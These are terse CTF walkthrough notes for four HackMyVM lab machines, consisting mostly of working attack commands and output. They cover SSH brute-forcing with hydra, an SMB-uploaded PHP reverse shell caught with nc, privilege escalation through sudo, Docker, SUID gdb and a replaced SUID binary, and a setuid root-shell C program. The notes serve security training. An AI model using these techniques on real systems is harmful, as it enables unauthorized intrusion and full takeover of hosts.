hackmyvm machines note

gift

gift

❯ hydra -l root -P ctf/tool/dic/rockyou.txt -s 22 192.168.0.106 ssh
...
[22][ssh] host: 192.168.0.106   login: root   password: simple
...

simple

gift:~# cat user.txt root.txt

pwned

pwned

scan

~
❯ rustscan -a  192.168.0.110
...

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack
53/tcp open  domain  syn-ack
80/tcp open  http    syn-ack

web

<h1>  vanakam nanba (Hello friend) </h1>

        A last note from Attacker :)

                   I am Annlynn. I am the hacker hacked your server with your employees but they don't know how i used them.
                   Now they worry about this. Before finding me investigate your employees first. (LOL) then find me Boomers XD..!!

<!-- I forgot to add this on last note
     You are pretty smart as i thought
     so here i left it for you
     She sings very well. l loved it  -->

Annlynn

dir

❯ gobuster dir -u http://192.168.0.110 -w ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
/nothing              (Status: 301) [Size: 316] [--> http://192.168.0.110/nothing/]
/server-status        (Status: 403) [Size: 278]
/hidden_text          (Status: 301) [Size: 320] [--> http://192.168.0.110/hidden_text/]
...

http://192.168.0.110/hidden_text/secret.dic

/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

❯ gobuster dir -u http://192.168.0.110 -w tmp
/pwned.vuln           (Status: 301) [Size: 319] [--> http://192.168.0.110/pwned.vuln/]
...

view-source:http://192.168.0.110/pwned.vuln/

<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else
//	echo "Invalid creds"
// }
?>

ftpuser
B0ss_B!TcH

login ftp

❯ ftp 192.168.0.110
...
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa
-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt
226 Directory send OK.
ftp> get id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.0064 seconds (397.2097 kbytes/s)
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.0064 seconds (11.4952 kbytes/s)
ftp> quit
221 Goodbye.
 
 ❯ cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(

ariana

ssh ariana

❯ ssh ariana@192.168.0.110 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ ls -la
total 40
drwxrwx--- 4 ariana ariana 4096 Jul 10  2020 .
drwxr-xr-x 5 root   root   4096 Jul 10  2020 ..
-rw-r--r-- 1 ariana ariana  142 Jul 10  2020 ariana-personal.diary
-rw------- 1 ariana ariana    4 Jul 10  2020 .bash_history
-rw-r--r-- 1 ariana ariana  220 Jul  4  2020 .bash_logout
-rw-r--r-- 1 ariana ariana 3526 Jul  4  2020 .bashrc
drwxr-xr-x 3 ariana ariana 4096 Jul  6  2020 .local
-rw-r--r-- 1 ariana ariana  807 Jul  4  2020 .profile
drwx------ 2 ariana ariana 4096 Jul  9  2020 .ssh
-rw-r--r-- 1 ariana ariana  143 Jul 10  2020 user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

ariana@pwned:~$ cat ariana-personal.diary
Its Ariana personal Diary :::

Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

$ cat /home/messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

$  sudo -u selena /home/messenger.sh
'alacritty': unknown terminal type.
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : selena

Enter message for selena :/bin/bash


id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

python3 -c "import pty; pty.spawn('/bin/bash');"
selena@pwned:/home/ariana$

selena@pwned:~$ cat user2.txt selena-personal.diary
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
Its Selena personal Diary :::

Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.

selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd
# ls -la
total 28
drwx------  3 root root 4096 Jul 10  2020 .
drwxr-xr-x 18 root root 4096 Jul  6  2020 ..
-rw-------  1 root root  292 Jul 10  2020 .bash_history
-rw-r--r--  1 root root  601 Jul  6  2020 .bashrc
drwxr-xr-x  3 root root 4096 Jul  4  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  429 Jul 10  2020 root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this （◎ . ◎）

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker

Twitter    Ajs_walker

Connection

Connection

scan

❯ rustscan -a  192.168.0.104
PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack
53/tcp  open  domain       syn-ack
80/tcp  open  http         syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

web

❯ gobuster dir -u http://192.168.0.104 -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status        (Status: 403) [Size: 278]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

smb

file upload

reverseShell

❯ smbclient --list=192.168.0.104 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❯ enum4linux -a -o 192.168.0.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  8 17:47:46 2025

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

❯ smbclient //192.168.0.104/share -N
smb: \> cd html
smb: \html\> ls
  index.html                          N    10701  Wed Sep 23 09:48:45 2020

smb: \html\> put reverseShell.php
putting file reverseShell.php as \html\reverseShell.php (3818.0 kb/s) (average 3818.4 kb/s)
smb: \html\> ls
  .                                   D        0  Fri Aug  8 18:12:41 2025
  ..                                  D        0  Wed Sep 23 09:48:39 2020
  index.html                          N    10701  Wed Sep 23 09:48:45 2020
  reverseShell.php                    A     3910  Fri Aug  8 18:12:41 2025

suid gdb

❯ rlwrap nc -lvnp 8848
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty; pty.spawn('/bin/bash');"

www-data@connection:/home/connection$ cat local.txt
cat local.txt
3f491443a2a6aa82bc86a3cda8c39617

www-data@connection:/$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root         54096 Jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root         44528 Jul 27  2018 /usr/bin/chsh
-rwsr-sr-x 1 root root       8008480 Oct 14  2019 /usr/bin/gdb
-rwsr-xr-x 1 root root         84016 Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root         51280 Jan 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root         44440 Jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root         63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root         63568 Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root         34888 Jan 10  2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus   51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root         10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root        436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign

www-data@connection:/$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
# cd root
cd root
# ls -al
ls -al
total 24
drwx------  3 root root 4096 Sep 22  2020 .
drwxr-xr-x 18 root root 4096 Sep 22  2020 ..
lrwxrwxrwx  1 root root    9 Sep 22  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Sep 22  2020 .local
lrwxrwxrwx  1 root root    9 Sep 22  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwx------  1 root root   33 Sep 22  2020 proof.txt
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cat proof.txt
cat proof.txt
a7c6ea4931ab86fb54c5400204474a39

suidy

scan

❯ rustscan -a  192.168.0.109 -- -A -sV
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
53/tcp open  domain  syn-ack (generic dns response: SERVFAIL)
80/tcp open  http    syn-ack nginx 1.14.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

web

❯ gobuster dir -u http://192.168.0.109/ -w ~/ctf/tool/dic/dir.txt
/index.html           (Status: 200) [Size: 22]
/robots.txt           (Status: 200) [Size: 362]

view-source:http://192.168.0.109/robots.txt

/hi
/....\..\.-\--.\.-\..\-.
/shehatesme

.... .. .- --. .- .. -.
from morse code
HIAGAIN
hiagain

http://192.168.0.109/shehatesme/

She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like "theuser/thepass" to access to her system!
All that you need is an small dict from Seclist!

❯ gobuster dir -u http://192.168.0.109/shehatesme/ -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt
/full.txt
/about.txt
/search.txt
/privacy.txt
/blog.txt
/new.txt
/page.txt
/forums.txt
/jobs.txt
/other.txt
/welcome.txt
/admin.txt
/faqs.txt
/2001.txt
/link.txt
/space.txt
/network.txt
/google.txt
/folder.txt
/java.txt
/issues.txt
/guide.txt
/es.txt
/art.txt
/smilies.txt
/airport.txt
/secret.txt
/procps.txt
/pynfo.txt
/lh2.txt
/muze.txt
/alba.txt
/cymru.txt
/wha.txt

request and get file

import requests
import sys

for j in sys.stdin:
        j=j.strip()
        response=requests.get(f"http://192.168.0.109/shehatesme{j}")
        # print(f"http://192.168.0.109/shehatesme{j}")
        print(response.text)

bruteforce

❯ cat tmp | python tmp.py | sort | uniq -c
     34
      1 hidden1/passZZ!
     25 jaime11/JKiufg6
      1 jhfbvgt/iugbnvh
      1 john765/FDrhguy
      1 maria11/jhfgyRf
      1 mmnnbbv/iughtyr
      1 nhvjguy/kjhgyut
      1 smileys/98GHbjh
      1 theuser/thepass
      1 yuijhse/hjupnkk

❯ hydra -L ./tmp -P ./tmp2 ssh://192.168.0.109
[22][ssh] host: 192.168.0.109   login: theuser   password: thepass

hidden1:passZZ!
jaime11:JKiufg6
jhfbvgt:iugbnvh
john765:FDrhguy
maria11:jhfgyRf
mmnnbbv:iughtyr
nhvjguy:kjhgyut
smileys:98GHbjh
theuser:thepass
yuijhse:hjupnkk

❯ hydra -C ./tmp  ssh://192.168.0.109
[22][ssh] host: 192.168.0.109   login: theuser   password: thepass

ssh

theuser/thepass
❯ ssh theuser@192.168.0.109
theuser@suidy:~$ ls -al
total 36
drwxr-xr-x 3 theuser theuser 4096 sep 27  2020 .
drwxr-xr-x 4 root    root    4096 sep 26  2020 ..
-rw------- 1 theuser theuser   29 sep 27  2020 .bash_history
-rw-r--r-- 1 theuser theuser  220 sep 26  2020 .bash_logout
-rw-r--r-- 1 theuser theuser 3526 sep 26  2020 .bashrc
drwxr-xr-x 3 theuser theuser 4096 sep 26  2020 .local
-rw-r--r-- 1 theuser theuser  807 sep 26  2020 .profile
-rw-r--r-- 1 theuser theuser   11 sep 26  2020 user.txt
-rw------- 1 theuser theuser   51 sep 26  2020 .Xauthority
theuser@suidy:~$ cat user.txt
HMV2353IVI

theuser@suidy:~$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsrwsr-x 1 root theuser     16704 sep 26  2020 /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root        54096 jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root        44528 jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root        84016 jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        51280 ene 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root        44440 jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root        63736 jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root        63568 ene 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root        34888 ene 10  2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus  51184 jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        10232 mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root       436552 ene 31  2020 /usr/lib/openssh/ssh-keysign

theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ id
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!

-suidy

upload

❯ python -m http.server

suidy@suidy:/home/suidy$ wget http://192.168.0.105:8000/pspy64

2025/08/08 14:49:41 CMD: UID=0     PID=1      | /sbin/init
2025/08/08 14:50:01 CMD: UID=0     PID=1446   | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0     PID=1447   | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0     PID=1448   | /bin/sh -c sh /root/timer.sh
2025/08/08 14:50:01 CMD: UID=0     PID=1449   | sh /root/timer.sh

upload and gcc and replace suidyyyyy

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

theuser@suidy:~$ gcc rootshell.c -o suidyyyyy
theuser@suidy:~$ cp suidyyyyy /home/suidy/suidyyyyy

theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# id

root@suidy:/root# cat root.txt
HMV0000EVE